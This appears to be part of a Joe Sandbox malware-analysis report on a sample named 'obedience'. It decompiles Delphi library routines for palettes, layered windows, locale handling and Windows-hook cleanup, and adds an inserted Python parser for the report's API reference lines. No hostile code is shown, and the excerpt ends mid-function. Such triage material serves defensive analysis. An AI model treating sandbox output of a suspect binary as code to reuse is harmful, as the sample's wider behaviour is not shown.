      				intOrPtr _t48;
      				void* _t50;
      				void* _t52;
      				intOrPtr _t53;
      
      				_t50 = _t52;
      				_t53 = _t52 + 0xfffffff4;
      				_t39 = __eax;
      				if( *((short*)(__eax + 0x68)) == 0xffff) {
      					return __eax;
      				} else {
      					_t14 =  *0x48f6b0; // 0x490904
      					_t17 =  *0x48f6b0; // 0x490904
      					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
      					_push(_t19);
      					L0042CFD4();
      					_v8 = _t19;
      					_push(_t50);
      					_push(0x44cbe4);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t53;
      					_t21 =  *0x48f9b8; // 0x490b80
      					E0042D014(_v8, E00462578( *_t21, __ecx,  *((short*)(__eax + 0x68))));
      					_t26 =  *0x48f9b8; // 0x490b80
      					E0042D014(_v8, E00462578( *_t26, __ecx,  *((short*)(_t39 + 0x68))));
      					_push(0);
      					_push(0);
      					_push(0);
      					_push(_v8);
      					L0042D064();
      					_push( &_v16);
      					_push(0);
      					L0042D074();
      					_push(_v12);
      					_push(_v16);
      					_push(1);
      					_push(_v8);
      					L0042D064();
      					_pop(_t48);
      					 *[fs:eax] = _t48;
      					_push(0x44cbeb);
      					_t37 = _v8;
      					_push(_t37);
      					L0042CFDC();
      					return _t37;
      				}
			}

      APIs
      • 6F8D7CB0.COMCTL32(00000000), ref: 0044CB56
        • Part of subcall function 0042D014: 6F8D0620.COMCTL32(004429C2,000000FF,00000000,0044CB86,00000000,0044CBE4,?,00000000), ref: 0042D018
      • 6F92BC60.COMCTL32(004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBAA
      • 6F92B6C0.COMCTL32(00000000,?,004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBB5
      • 6F92BC60.COMCTL32(004429C2,00000001,?,0044CC4D,00000000,?,004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBC8
      • 6F8D7D50.COMCTL32(004429C2,0044CBEB,0044CC4D,00000000,?,004429C2,00000000,00000000,00000000,00000000,0044CBE4,?,00000000), ref: 0044CBDE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: D0620
      • String ID:
      • API String ID: 1882524874-0
      • Opcode ID: 317f5cf8a15963b9bfd1066e22afc9acd74bf1e3930a3924ac04c79888505aa5
      • Instruction ID: 1d07dbf0ba8fdc1f6aae7a58e941b7a477ed210d26d145e5797f5572df9a215b
      • Opcode Fuzzy Hash: 317f5cf8a15963b9bfd1066e22afc9acd74bf1e3930a3924ac04c79888505aa5
      • Instruction Fuzzy Hash: 86214C75B44204BFEB10EBA8DC82F5D73E8EB09B04F5004A5FA00EB2A1DA75ED41C759
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E0042B1A8(struct HPALETTE__* __eax) {
      				struct HPALETTE__* _t21;
      				char _t28;
      				signed int _t30;
      				struct HPALETTE__* _t36;
      				struct HPALETTE__* _t37;
      				struct HDC__* _t38;
      				intOrPtr _t39;
      
      				_t21 = __eax;
      				_t36 = __eax;
      				_t39 =  *((intOrPtr*)(__eax + 0x28));
      				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
      					_t22 =  *((intOrPtr*)(_t39 + 0x14));
      					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
      						E00429C00(_t22);
      					}
      					_t21 = E004275F4( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
      					_t37 = _t21;
      					 *(_t39 + 0x10) = _t37;
      					if(_t37 == 0) {
						_push(0);
						L00407658(); // GetDC(0) via import thunk (listed as 73BEAC50.USER32 at 0042B1FE)
						_t21 = E00426EF8(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) { // cached "needs halftone palette" flag
							L9:
							_t28 = 1;
						} else {
							_push(0xc); // BITSPIXEL
							_push(_t38);
							L00407348(); // GetDeviceCaps(dc, BITSPIXEL)
							_push(0xe); // PLANES
							_push(_t38);
							L00407348(); // GetDeviceCaps(dc, PLANES)
							_t30 = _t21 * _t21; // decompiler collapsed the operands: screen depth = BITSPIXEL * PLANES
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff); // bitmap depth = bmBitsPixel * bmPlanes from the DIBSECTION
							if(_t30 < _t21) { // screen shallower than the bitmap: use a halftone palette
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L004078C0(); // ReleaseDC(0, dc) via thunk (listed as 73BEB380.USER32 at 0042B24C)
      						if( *(_t39 + 0x10) == 0) {
      							 *((char*)(_t36 + 0x30)) = 1;
      							return _t21;
      						}
      					}
      				}
      				return _t21;
			}

      APIs
      • 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
      • 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
      • 73BEAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B21D
      • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
      • 73BEB380.USER32(00000000,00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B24C
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380CreateHalftonePalette
      • String ID:
      • API String ID: 178651289-0
      • Opcode ID: 559da552b48e6d3ee41e7dc89cf2b571fbfc4dbf88e11fe7153bf1a347e389a4
      • Instruction ID: 22fab76b6008ebf0b826f02d2bff6e098fe8313a2446bab708ef7e92ffb450ad
      • Opcode Fuzzy Hash: 559da552b48e6d3ee41e7dc89cf2b571fbfc4dbf88e11fe7153bf1a347e389a4
      • Instruction Fuzzy Hash: 6A11B431705369DADB24EF65A4497EF3790FF51394F80016AFC00A6681D7B89C94C3EA
      Uniqueness

      Uniqueness Score: -1.00%
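The "APIs" lists attached to these function records mix named imports (CreateHalftonePalette.GDI32, GetWindowLongA.USER32) with entries such as 73BEAC50.USER32 or 6F8D7CB0.COMCTL32, where the plugin recorded only the address of the call target inside the loaded DLL, reached through an import thunk like L00407658 in the decompiled code, and not an export name. Those addresses belong to this run's module layout and change under ASLR, so an analyst triaging the report wants the unresolved call sites pulled out and mapped back to exports by hand. The following is an added example and is not part of the Joe Sandbox report or its IDA plugin: a Python parser for these reference lines. The line format and the sample lines are taken from this page; the function names parse_api_lines and summarize are the example's own.

```python
import re
from collections import Counter

# Constructed sample input: API reference lines copied from the "APIs" lists of
# the function records in this report (one "Part of subcall function" line included).
SAMPLE_API_LINES = """\
• 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
• 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
• CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
• GetWindowLongA.USER32 ref: 004617A0
• SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045F358), ref: 0046180C
  • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
• EnumCalendarInfoA.KERNEL32(Function_0000C5F4,00000000,00000000,00000004), ref: 0040C6FB
"""

# One "• Name.MODULE(args), ref: ADDR" line. The argument list and the
# "Part of subcall function XXXXXXXX:" prefix are both optional in the report.
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<subcall>[0-9A-Fa-f]{8}):\s*)?
        (?P<name>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        \s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)

# A "name" that is just eight hex digits is the raw call-target address the
# plugin recorded instead of an export name.
RAW_ADDRESS = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_lines(text):
    """Return one dict per parsable API reference line; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref").upper(),        # call site inside the sample
            "subcall": m.group("subcall"),        # None when the call is direct
            "unresolved": bool(RAW_ADDRESS.match(m.group("name"))),
        })
    return records


def summarize(records):
    """Count calls per module and list the call sites that carry no export name."""
    return {
        "by_module": dict(Counter(r["module"] for r in records)),
        "unresolved": [r["name"] for r in records if r["unresolved"]],
        "unresolved_refs": [r["ref"] for r in records if r["unresolved"]],
    }


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE_API_LINES)
    for r in recs:
        tag = "RAW " if r["unresolved"] else "    "
        print(f'{tag}{r["ref"]} {r["module"]}!{r["name"]} ({len(r["args"])} args)')
    print(summarize(recs))
```

Run against the full report text the same way; the "ref" of each unresolved entry is the call site to open in the decompiled listing, and the module name in the entry tells you which DLL's export table to search for the address once you know that run's base address for the module.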

      C-Code - Quality: 62%
			// Shape matches the VCL TCustomForm.SetLayeredAttribs: toggles WS_EX_LAYERED on the form window
			// and calls SetLayeredWindowAttributes through a pointer at 0x48ee20 that is resolved at run time
			// (see the SetLayeredWindowAttributes ref at 0046180C in the API list for this function).
			E0046176C(void* __eax) {
      				void* _t16;
      				void* _t37;
      				void* _t38;
      				signed int _t41;
      
      				_t16 = __eax;
      				_t38 = __eax;
				// bit 0x10 of the state word clear (csDesigning in the VCL) and the run-time-resolved API pointer non-null
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x48ee20 != 0) {
      					_t16 = E0044B45C(__eax);
      					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0044B158(_t38), 0xffffffec); // GWL_EXSTYLE (-20); E0044B158 returns the control's HWND
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) { // alpha-blend or transparent-colour flag set
							if((_t41 & 0x00080000) == 0) { // WS_EX_LAYERED missing: add it
								SetWindowLongA(E0044B158(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							// SetLayeredWindowAttributes(hwnd, colour key, alpha, LWA_* flags taken from two lookup tables)
							return  *0x48ee20(E0044B158(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0048EEA4 |  *0x0048EEAC);
						} else {
							SetWindowLongA(E0044B158(_t38), 0xffffffec, _t41 & 0xfff7ffff); // clear WS_EX_LAYERED
							_push(0x485); // RDW_INVALIDATE | RDW_ERASE | RDW_ALLCHILDREN | RDW_FRAME
							_push(0);
							_push(0);
							_t37 = E0044B158(_t38);
							_push(_t37);
							L00407898(); // RedrawWindow(hwnd, NULL, 0, 0x485) via thunk (listed as 73BEB330.USER32 at 0046183B)
      							return _t37;
      						}
      					}
      				}
      				return _t16;
			}

      APIs
      • GetWindowLongA.USER32 ref: 004617A0
      • SetWindowLongA.USER32 ref: 004617D2
      • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045F358), ref: 0046180C
      • SetWindowLongA.USER32 ref: 00461825
      • 73BEB330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045F358), ref: 0046183B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Long$AttributesB330Layered
      • String ID:
      • API String ID: 1770052509-0
      • Opcode ID: 9bef555e0ba252e4f153bee74b45bab7266b7c42411ec9f6e12ee93a07049bbd
      • Instruction ID: 1efd3db1c2be9bddd514659e88fdb6ad086607bbdffeb184261ae6bfe5076f9d
      • Opcode Fuzzy Hash: 9bef555e0ba252e4f153bee74b45bab7266b7c42411ec9f6e12ee93a07049bbd
      • Instruction Fuzzy Hash: 6111E761A4438029DB507F7A8C8DF9B26484B15358F084D7AB944EB3E3CB6CD844C36D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 40%
      			E0042755C(intOrPtr __eax) {
      				char _v5;
      				intOrPtr _v12;
      				intOrPtr _t14;
      				intOrPtr _t16;
      				intOrPtr _t18;
      				intOrPtr _t21;
      				intOrPtr _t30;
      				void* _t32;
      				void* _t34;
      				intOrPtr _t35;
      
      				_t32 = _t34;
      				_t35 = _t34 + 0xfffffff8;
      				_v5 = 0;
      				if( *0x490890 == 0) {
      					return _v5;
      				} else {
					_push(0);
					L00407658(); // GetDC(0) via thunk (listed as 73BEAC50.USER32 at 00427574)
					_v12 = __eax;
					_push(_t32); // Delphi try..finally frame: handler 0x4275e2 is pushed onto the SEH chain
					_push(0x4275e2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68); // SIZEPALETTE
					_t14 = _v12;
					_push(_t14);
					L00407348(); // GetDeviceCaps(dc, SIZEPALETTE)
					if(_t14 >= 0x10) { // palette device with at least 16 entries
						// GetPaletteEntries(*0x490890, 0, 8, &palPalEntry[0]): first 8 system colours into the LOGPALETTE at __eax
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x490890; // 0xc0809fd
						_push(_t18);
						L00407370();
						// GetPaletteEntries(*0x490890, 8, 8, &palPalEntry[palNumEntries - 8]): last 8 system colours into the tail
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x490890; // 0xc0809fd
						_push(_t21);
						L00407370();
						_v5 = 1;
					}
					_pop(_t30); // finally: unregister the SEH frame
					 *[fs:eax] = _t30;
					_push(0x4275e9);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L004078C0(); // ReleaseDC(0, dc) via thunk (listed as 73BEB380.USER32 at 004275DC)
      					return _t16;
      				}
			}

      APIs
      • 73BEAC50.USER32(00000000), ref: 00427574
      • 73BEAD70.GDI32(?,00000068,00000000,004275E2,?,00000000), ref: 00427590
      • 73BEAEA0.GDI32(0C0809FD,00000000,00000008,?,?,00000068,00000000,004275E2,?,00000000), ref: 004275A8
      • 73BEAEA0.GDI32(0C0809FD,00000008,00000008,?,0C0809FD,00000000,00000008,?,?,00000068,00000000,004275E2,?,00000000), ref: 004275C0
      • 73BEB380.USER32(00000000,?,004275E9,004275E2,?,00000000), ref: 004275DC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380
      • String ID:
      • API String ID: 120756276-0
      • Opcode ID: 5980a92291095bee650e6f3ced05f38d73c55a0c11fe7579cb33e930b7418743
      • Instruction ID: 097f5ada2232ac645d083fd088fef1f4185722509756cd8136fbc554a02ccf32
      • Opcode Fuzzy Hash: 5980a92291095bee650e6f3ced05f38d73c55a0c11fe7579cb33e930b7418743
      • Instruction Fuzzy Hash: 2211A531A4C304BFFB15EBA59C42F6D7BA8E705714F5080ABF504AA5C1DA7A6444C729
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 64%
      			E0040C6A8(void* __esi, void* __eflags) {
      				char _v8;
      				intOrPtr* _t18;
      				intOrPtr _t26;
      				void* _t27;
      				long _t29;
      				intOrPtr _t32;
      				void* _t33;
      
      				_t33 = __eflags;
      				_push(0);
      				_push(_t32);
      				_push(0x40c73f);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t32;
				// Matches the VCL SysUtils GetEraNamesAndYearOffsets: E0040C420 wraps GetLocaleInfoA (see the subcall
				// ref below) with LCType 0x100b = LOCALE_IOPTIONALCALENDAR, E0040938C converts the result to an integer.
				E0040C420(GetThreadLocale(), 0x40c754, 0x100b,  &_v8);
				_t29 = E0040938C(0x40c754, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) { // range check on the calendar id (the VCL source tests CalendarType in [3..5]: Japanese, Taiwan, Korean era calendars)
					EnumCalendarInfoA(E0040C5F4, GetThreadLocale(), _t29, 4); // CAL_SERASTRING: collect era names
					_t27 = 7; // reset the 7-entry era year-offset table at 0x49076c to -1
					_t18 = 0x49076c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040C630, GetThreadLocale(), _t29, 3); // CAL_IYEAROFFSETRANGE: collect era year offsets
      				}
      				_pop(_t26);
      				 *[fs:eax] = _t26;
      				_push(E0040C746);
      				return E00404A40( &_v8);
			}

      APIs
      • GetThreadLocale.KERNEL32(?,00000000,0040C73F,?,?,00000000), ref: 0040C6C0
        • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040C73F,?,?,00000000), ref: 0040C6F0
      • EnumCalendarInfoA.KERNEL32(Function_0000C5F4,00000000,00000000,00000004), ref: 0040C6FB
      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040C73F,?,?,00000000), ref: 0040C719
      • EnumCalendarInfoA.KERNEL32(Function_0000C630,00000000,00000000,00000003), ref: 0040C724
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Locale$InfoThread$CalendarEnum
      • String ID:
      • API String ID: 4102113445-0
      • Opcode ID: bf7fad09778cf3921f1cb2127e7e30537135791d18a7403da584ceee64560b0c
      • Instruction ID: 0edabc44f08101759ca7b395f24750fd59c6476673de40f7563633dde48efa88
      • Opcode Fuzzy Hash: bf7fad09778cf3921f1cb2127e7e30537135791d18a7403da584ceee64560b0c
      • Instruction Fuzzy Hash: 4E01F234A04205ABE701A7B58C93B6B715CDB89728F210A77F501BB6C2D77CAE004AAD
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00462EA0() {
      				void* _t2;
      				void* _t5;
      				void* _t8;
      				struct HHOOK__* _t10;
      
				if( *0x490b94 != 0) { // global HHOOK installed earlier: remove the Windows hook
					_t10 =  *0x490b94; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x490b94 = 0;
				if( *0x490b98 != 0) { // handle of the thread that serviced the hook
					_t2 =  *0x490b90; // 0x0
					SetEvent(_t2); // signal the thread to stop
					if(GetCurrentThreadId() !=  *0x490b8c) { // only wait when not called from that thread itself (would self-deadlock)
						_t8 =  *0x490b98; // 0x0
						WaitForSingleObject(_t8, 0xffffffff); // INFINITE
					}
					_t5 =  *0x490b98; // 0x0
					CloseHandle(_t5);
					 *0x490b98 = 0;
					return 0;
      				}
      				return 0;
			}

      APIs
      • UnhookWindowsHookEx.USER32(00000000), ref: 00462EAF
      • SetEvent.KERNEL32(00000000,004653A6,00000000,0046436B,?,?,?,00000001,0046442B,?,?,?,?), ref: 00462ECA
      • GetCurrentThreadId.KERNEL32 ref: 00462ECF
      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,004653A6,00000000,0046436B,?,?,?,00000001,0046442B,?,?,?,?), ref: 00462EE4
      • CloseHandle.KERNEL32(00000000,00000000,004653A6,00000000,0046436B,?,?,?,00000001,0046442B,?,?,?,?), ref: 00462EEF
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
      • String ID:
      • API String ID: 2429646606-0
      • Opcode ID: 90236d9fd8387fc473fc657ace2a2c1de5ad54aa66cff3a3fda0c12be6803dbc
      • Instruction ID: 87b28704a2e82de7c3876f6976a1f4a6f7748830999cbac75b4e8e13186f45b2
      • Opcode Fuzzy Hash: 90236d9fd8387fc473fc657ace2a2c1de5ad54aa66cff3a3fda0c12be6803dbc
      • Instruction Fuzzy Hash: 80F050B2914540AFD750EBF9ED4AE5632A4A72431DF14453BB128D72E2D778B440C71D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E0040C758(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _v8;
      				char _v12;
      				intOrPtr _v16;
      				char _v20;
      				char _v24;
      				void* _t41;
      				signed int _t45;
      				signed int _t47;
      				signed int _t49;
      				signed int _t51;
      				intOrPtr _t75;
      				void* _t76;
      				signed int _t77;
      				signed int _t83;
      				signed int _t92;
      				intOrPtr _t111;
      				void* _t122;
      				void* _t124;
      				intOrPtr _t127;
      				void* _t128;
      
      				_t128 = __eflags;
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_t122 = __edx;
      				_t124 = __eax;
      				_push(_t127);
      				_push(0x40c922);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t127;
      				_t92 = 1;
      				E00404A40(__edx);
      				E0040C420(GetThreadLocale(), 0x40c938, 0x1009,  &_v12);
      				if(E0040938C(0x40c938, 1, _t128) + 0xfffffffd - 3 < 0) {
      					while(1) {
      						_t41 = E00404D00(_t124);
      						__eflags = _t92 - _t41;
      						if(_t92 > _t41) {
      							goto L28;
      						}
      						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
      						asm("bt [0x48e110], eax");
      						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
      							_t45 = E00409B94(_t124 + _t92 - 1, 2, 0x40c93c);
      							__eflags = _t45;
      							if(_t45 != 0) {
      								_t47 = E00409B94(_t124 + _t92 - 1, 4, 0x40c94c);
      								__eflags = _t47;
      								if(_t47 != 0) {
      									_t49 = E00409B94(_t124 + _t92 - 1, 2, 0x40c964);
      									__eflags = _t49;
      									if(_t49 != 0) {
      										_t51 =  *(_t124 + _t92 - 1) - 0x59;
      										__eflags = _t51;
      										if(_t51 == 0) {
      											L24:
      											E00404D08(_t122, 0x40c97c);
      										} else {
      											__eflags = _t51 != 0x20;
      											if(_t51 != 0x20) {
      												E00404C28();
      												E00404D08(_t122, _v24);
      											} else {
      												goto L24;
      											}
      										}
      									} else {
      										E00404D08(_t122, 0x40c970);
      										_t92 = _t92 + 1;
      									}
      								} else {
      									E00404D08(_t122, 0x40c95c);
      									_t92 = _t92 + 3;
      								}
      							} else {
      								E00404D08(_t122, 0x40c948);
      								_t92 = _t92 + 1;
      							}
      							_t92 = _t92 + 1;
      							__eflags = _t92;
      						} else {
      							_v8 = E0040D7F8(_t124, _t92);
      							E00404F60(_t124, _v8, _t92,  &_v20);
      							E00404D08(_t122, _v20);
      							_t92 = _t92 + _v8;
      						}
      					}
      				} else {
      					_t75 =  *0x490744; // 0x9
      					_t76 = _t75 - 4;
      					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
      						_t77 = 1;
      					} else {
      						_t77 = 0;
      					}
      					if(_t77 == 0) {
      						E00404A94(_t122, _t124);
      					} else {
